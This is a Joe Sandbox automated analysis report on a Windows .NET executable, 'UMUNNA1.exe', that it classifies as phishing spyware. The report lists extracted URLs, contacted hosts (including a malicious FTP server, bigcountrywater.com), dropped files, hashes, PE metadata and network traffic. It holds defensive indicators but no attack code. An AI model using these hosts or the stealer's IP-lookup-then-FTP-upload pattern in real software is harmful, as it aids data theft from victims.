http://www.sandoll.co.kr	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.site.com/logs.php	UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.nirsoft.net/	vbc.exe, vbc.exe, 00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmS	UMUNNA1.exe, 00000000.00000003.668596839.0000000005140000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/Y0rooI	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.fonts.comccW:	UMUNNA1.exe, 00000000.00000003.656564325.000000000515B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://whatismyipaddress.com	UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.coma	UMUNNA1.exe, 00000000.00000003.668596839.0000000005140000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.comX	UMUNNA1.exe, 00000000.00000003.656600121.0000000005175000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/-czKI	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/Y0/	UMUNNA1.exe, 00000000.00000003.658649586.0000000005151000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/a-dRI	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/p	UMUNNA1.exe, 00000000.00000003.658718286.0000000005151000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/es-e	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/adnl	UMUNNA1.exe, 00000000.00000003.658517716.000000000514A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/%I	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.16.155.36	whatismyipaddress.com	United States		13335	CLOUDFLARENETUS	false
155.254.17.54	bigcountrywater.com	United States		397423	TIER-NETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	443952
Start date:	04.07.2021
Start time:	09:23:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	UMUNNA1.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@7/4@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.8% (good quality ratio 21.3%) Quality average: 74.5% Quality standard deviation: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 277 Number of non-executed functions: 62
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 20.82.210.154, 20.54.7.98, 40.112.88.60, 20.50.102.62, 80.67.82.211, 80.67.82.235, 20.82.209.183 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:24:18	API Interceptor	6x Sleep call for process: UMUNNA1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.16.155.36	Sample_B.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	PO_Invoices_pdf.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	Orders.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	nzGUqSK11D.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	PO 2010029_pdf Quotation from Alibaba Ale.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	PO 2010029_pdf Quotation from Alibaba Ale.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	hkaP5RPCGNDVq3Z.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	NDt93WWQwd089H7.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	PURCHASE ORDER.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	BANK-STATMENT _xlsx.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	INQUIRY.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	Prueba de pago.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	mR3CdUkyLL.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	6JLHKYvboo.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	jSMd8npgmU.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	RXk6PjNTN8.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	9vdouqRTh3.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	5pB35gGfZ5.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	fyxC4Hgs3s.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	yk94P18VKp.exe	Get hash	malicious	Browse	whatismyipaddress.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bigcountrywater.com	9Swift.exe	Get hash	malicious	Browse	23.229.206.201
whatismyipaddress.com	avBs9sy0eQ.exe	Get hash	malicious	Browse	66.171.248.178
	First_stely_shit_open_please.exe	Get hash	malicious	Browse	66.171.248.178
	tracking_number.pdf.(1).exe	Get hash	malicious	Browse	66.171.248.178
	tracking_number.pdf(2).exe	Get hash	malicious	Browse	66.171.248.178
	HID Purchase LedgerAdvice - 2001330.jar	Get hash	malicious	Browse	66.171.248.178
	PaymentNotification.vbs	Get hash	malicious	Browse	104.16.154.36
	HID Purchase LedgerAdvice - 2001330.jar	Get hash	malicious	Browse	66.171.248.178
	HID Purchase LedgerAdvice - 2001330.jar	Get hash	malicious	Browse	66.171.248.178
	X5zr4r9Dbf.jar	Get hash	malicious	Browse	66.171.248.178
	4IttFJZwMj.jar	Get hash	malicious	Browse	66.171.248.178
	C8XAVCtsW4.jar	Get hash	malicious	Browse	66.171.248.178
	u2qcULTj3T.jar	Get hash	malicious	Browse	66.171.248.178
	u2qcULTj3T.jar	Get hash	malicious	Browse	66.171.248.178
	Gzw4s0btmW.jar	Get hash	malicious	Browse	66.171.248.178
	2NijKfXlSp.jar	Get hash	malicious	Browse	66.171.248.178
	Gzw4s0btmW.jar	Get hash	malicious	Browse	66.171.248.178
	RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jar	Get hash	malicious	Browse	66.171.248.178
	RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jar	Get hash	malicious	Browse	66.171.248.178
	Cg8OqFNi9n.jar	Get hash	malicious	Browse	66.171.248.178
	Cg8OqFNi9n.jar	Get hash	malicious	Browse	66.171.248.178

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	HCqVspxrwz.exe	Get hash	malicious	Browse	104.21.8.151
	r5wdbvxLE4.dll	Get hash	malicious	Browse	104.26.6.139
	pvvCaP2Nma.dll	Get hash	malicious	Browse	104.20.184.68
	IsNv5L683X.dll	Get hash	malicious	Browse	104.20.184.68
	r5wdbvxLE4.dll	Get hash	malicious	Browse	104.20.185.68
	IsNv5L683X.dll	Get hash	malicious	Browse	172.67.70.134
	pvvCaP2Nma.dll	Get hash	malicious	Browse	104.20.184.68
	Invoice_1980.exe	Get hash	malicious	Browse	104.21.19.200
	FNC17NRjZo.exe	Get hash	malicious	Browse	172.67.193.180
	0ak0YL2Y5p.exe	Get hash	malicious	Browse	172.67.200.215
	tIgU8l88x7.exe	Get hash	malicious	Browse	172.67.201.250
	zJyo5ESdjq.exe	Get hash	malicious	Browse	104.26.13.31
	SoMuAF6xvf.dll	Get hash	malicious	Browse	172.67.70.134
	52470XObuZ.dll	Get hash	malicious	Browse	104.20.184.68
	SoMuAF6xvf.dll	Get hash	malicious	Browse	104.20.184.68
	52470XObuZ.dll	Get hash	malicious	Browse	104.20.184.68
	Tlq0uX7lw7.exe	Get hash	malicious	Browse	172.67.206.104
	VD53lEsR4p.exe	Get hash	malicious	Browse	172.67.182.129
	9XLiTBw5RO.dll	Get hash	malicious	Browse	104.20.185.68
	JkA2JZSJ7F.dll	Get hash	malicious	Browse	104.20.184.68

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\UMUNNA1.exe.log Download File
Process:	C:\Users\user\Desktop\UMUNNA1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
MD5:	61CCF53571C9ABA6511D696CB0D32E45
SHA1:	A13A42A20EC14942F52DB20FB16A0A520F8183CE
SHA-256:	3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
SHA-512:	90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Temp\holderwb.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\AppData\Roaming\pid.txt Download File
Process:	C:\Users\user\Desktop\UMUNNA1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:AC:AC
MD5:	86B48B560A92D18429BCFCA2C70EE733
SHA1:	FF4FCD352B70C29F1B65C7D1702239A5C4A5F323
SHA-256:	A4E95083AD6163AB0961E8E0D2CAECEB402A089352E21A0C32233EF4C0423AEB
SHA-512:	86EF0301A9D9B7DA5C51F1F83512D0FA90B9FA3C9D425ABC4EE6500766DC5ABC053C549522E19ABED110387BCE0A235A531BB419F870DAEEA60D29CC5F25CD75
Malicious:	false
Preview:	5052

C:\Users\user\AppData\Roaming\pidloc.txt Download File
Process:	C:\Users\user\Desktop\UMUNNA1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.017917900762097
Encrypted:	false
SSDEEP:	3:oNt+WfWwodUJ:oNwvwOUJ
MD5:	50673E82D6FA82ACA184725D2179FECF
SHA1:	B8D39FD729EA7B7326DF24F7C0BB7BDFCD7E502A
SHA-256:	CC8D872DC806A06A10A241DC2534578DE60294F478713E565D979F45CB3B5B30
SHA-512:	2C60EF5B2F5F114D783DB43C0578C2A5856F2F35B4AB430BD717FFC8039D0E13067969363E9D448A1F87B0F653F3022C5562456C0367B1FDF7D1D1B71BF2C52D
Malicious:	false
Preview:	C:\Users\user\Desktop\UMUNNA1.exe

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.705098446388519
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	UMUNNA1.exe
File size:	715264
MD5:	88fd4cf81a72a7a8642b4e248626bd28
SHA1:	10f58d151e0ce590c27d2a9c33a2c5f8fdbf518b
SHA256:	6bad2fb94eb774403450fc90c697e457c2d260eb0b20a96f15ee82cef6f74d86
SHA512:	143f486ee43ae26d1b6cffd5c3269334e8454e1642caac84f38abdaf1e41f6804a3cdb2f0ad925a83554d5b166b75f681321e800a76ecea06e61dc414f142037
SSDEEP:	12288:g65g0U7KeWP0inCfP1nUi7OZgS+zxkVmLbn/iIXE58oRmvPpE3/:j5g0UiP70PpPqM3nNK8oGPpE3
File Content Preview:	MZ......................@................................a..............!..L.!This program cannot be run in DOS mode....$.......PE..L...o..U.....................d........... ........@.. .......................`............@................................

File Icon


Icon Hash:	aa8cac8eb6b28a84

Static PE Info

General
Entrypoint:	0x4aa28e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x55E3926F [Sun Aug 30 23:31:59 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:	v2.0.50727
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaa240	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x618e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa8294	0xa8400	False	0.867503830795	data	7.73736029281	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x618e	0x6200	False	0.193757971939	data	4.84515677061	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb4000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xac2cc	0xea8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0xad174	0x6c8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0xad83c	0x5d8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0xade14	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0xae37c	0x25a8	data
RT_ICON	0xb0924	0x988	data
RT_ICON	0xb12ac	0x580	data
RT_ICON	0xb182c	0x468	GLS_BINARY_LSB_FIRST
RT_RCDATA	0xb1c94	0x20	data
RT_GROUP_ICON	0xb1cb4	0x76	data
RT_VERSION	0xb1d2c	0x278	data	English	United States
RT_MANIFEST	0xb1fa4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	Cremosso, Inc.
FileVersion	3.8.8.0
CompanyName	Cremosso, Inc.
ProductName	cremosso
ProductVersion	3.8.8.0
FileDescription	cremosso
OriginalFilename	cremosso.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/04/21-09:24:24.071034	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49742	104.16.155.36	192.168.2.4
07/04/21-09:24:41.608633	TCP	491	INFO FTP Bad login	21	49748	155.254.17.54	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2021 09:24:23.982891083 CEST	49742	80	192.168.2.4	104.16.155.36
Jul 4, 2021 09:24:24.023127079 CEST	80	49742	104.16.155.36	192.168.2.4
Jul 4, 2021 09:24:24.024121046 CEST	49742	80	192.168.2.4	104.16.155.36
Jul 4, 2021 09:24:24.024159908 CEST	49742	80	192.168.2.4	104.16.155.36
Jul 4, 2021 09:24:24.063179016 CEST	80	49742	104.16.155.36	192.168.2.4
Jul 4, 2021 09:24:24.071033955 CEST	80	49742	104.16.155.36	192.168.2.4
Jul 4, 2021 09:24:24.114907980 CEST	49742	80	192.168.2.4	104.16.155.36
Jul 4, 2021 09:24:36.496680975 CEST	49742	80	192.168.2.4	104.16.155.36
Jul 4, 2021 09:24:36.535037994 CEST	80	49742	104.16.155.36	192.168.2.4
Jul 4, 2021 09:24:36.535165071 CEST	49742	80	192.168.2.4	104.16.155.36
Jul 4, 2021 09:24:36.571470022 CEST	49748	21	192.168.2.4	155.254.17.54
Jul 4, 2021 09:24:36.770648956 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:36.770787954 CEST	49748	21	192.168.2.4	155.254.17.54
Jul 4, 2021 09:24:36.970735073 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:36.971132040 CEST	49748	21	192.168.2.4	155.254.17.54
Jul 4, 2021 09:24:37.170162916 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:37.170186043 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:37.170418024 CEST	49748	21	192.168.2.4	155.254.17.54
Jul 4, 2021 09:24:37.409287930 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:41.608633041 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:41.610315084 CEST	49748	21	192.168.2.4	155.254.17.54
Jul 4, 2021 09:24:41.809349060 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:41.809818983 CEST	21	49748	155.254.17.54	192.168.2.4
Jul 4, 2021 09:24:41.810973883 CEST	49748	21	192.168.2.4	155.254.17.54
Jul 4, 2021 09:24:41.811014891 CEST	49748	21	192.168.2.4	155.254.17.54

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2021 09:24:08.344702005 CEST	58028	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:08.399533987 CEST	53	58028	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:09.239294052 CEST	53097	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:09.293987036 CEST	53	53097	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:10.228697062 CEST	49257	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:10.279289007 CEST	53	49257	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:11.553862095 CEST	62389	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:11.608175993 CEST	53	62389	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:12.618946075 CEST	49910	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:12.681560993 CEST	53	49910	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:14.538034916 CEST	55854	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:14.592598915 CEST	53	55854	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:15.332473993 CEST	64549	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:15.386759996 CEST	53	64549	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:18.215495110 CEST	63153	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:18.269802094 CEST	53	63153	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:19.037744999 CEST	52991	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:19.094075918 CEST	53	52991	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:19.922126055 CEST	53700	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:19.971455097 CEST	53	53700	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:20.700006962 CEST	51726	53	192.168.2.4	8.8.8.8
